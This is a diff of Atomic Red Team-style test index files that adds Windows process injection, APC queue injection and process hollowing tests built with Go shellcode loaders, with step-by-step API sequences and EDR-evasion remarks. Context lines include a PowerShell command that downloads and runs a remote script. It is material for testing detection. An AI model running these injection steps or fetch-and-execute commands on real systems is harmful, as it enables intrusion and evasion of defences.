@@ -48499,6 +49087,25 @@ execution:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
         name: powershell
+    - name: Run Shellcode via Syscall in Go
+      auto_generated_guid: ae56083f-28d0-417d-84da-df4242da1f7c
+      description: |
+        Runs shellcode in the current running process via a syscall.
+
+        Steps taken with this technique
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Use syscall to execute the entrypoint of the shellcode
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1106\\bin\\x64\\syscall.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1059.009:
     technique:
       modified: '2023-04-14T18:04:54.607Z'

atomics/Indexes/windows-index.yaml

@@ -6432,6 +6432,192 @@ defense-evasion:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1205:
     technique:
       modified: '2022-10-19T23:08:40.603Z'
@@ -12569,6 +12755,60 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1647:
     technique:
       x_mitre_platforms:
@@ -16868,6 +17108,60 @@ defense-evasion:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1564.009:
     technique:
       x_mitre_platforms:
@@ -28316,6 +28610,192 @@ privilege-escalation:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1611:
     technique:
       modified: '2023-04-15T16:21:04.265Z'
@@ -30649,6 +31129,60 @@ privilege-escalation:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -33957,6 +34491,60 @@ privilege-escalation:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1068:
     technique:
       modified: '2023-04-07T17:13:54.168Z'
@@ -39913,6 +40501,25 @@ execution:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')
         name: powershell
+    - name: Run Shellcode via Syscall in Go
+      auto_generated_guid: ae56083f-28d0-417d-84da-df4242da1f7c
+      description: |
+        Runs shellcode in the current running process via a syscall.
+
+        Steps taken with this technique
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Use syscall to execute the entrypoint of the shellcode
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#syscall)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1106\\bin\\x64\\syscall.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1059.009:
     technique:
       modified: '2023-04-14T18:04:54.607Z'

atomics/T1055.004/T1055.004.md

@@ -12,6 +12,10 @@ Running code in the context of another process may allow access to the process's
 
 - [Atomic Test #1 - Process Injection via C#](#atomic-test-1---process-injection-via-c)
 
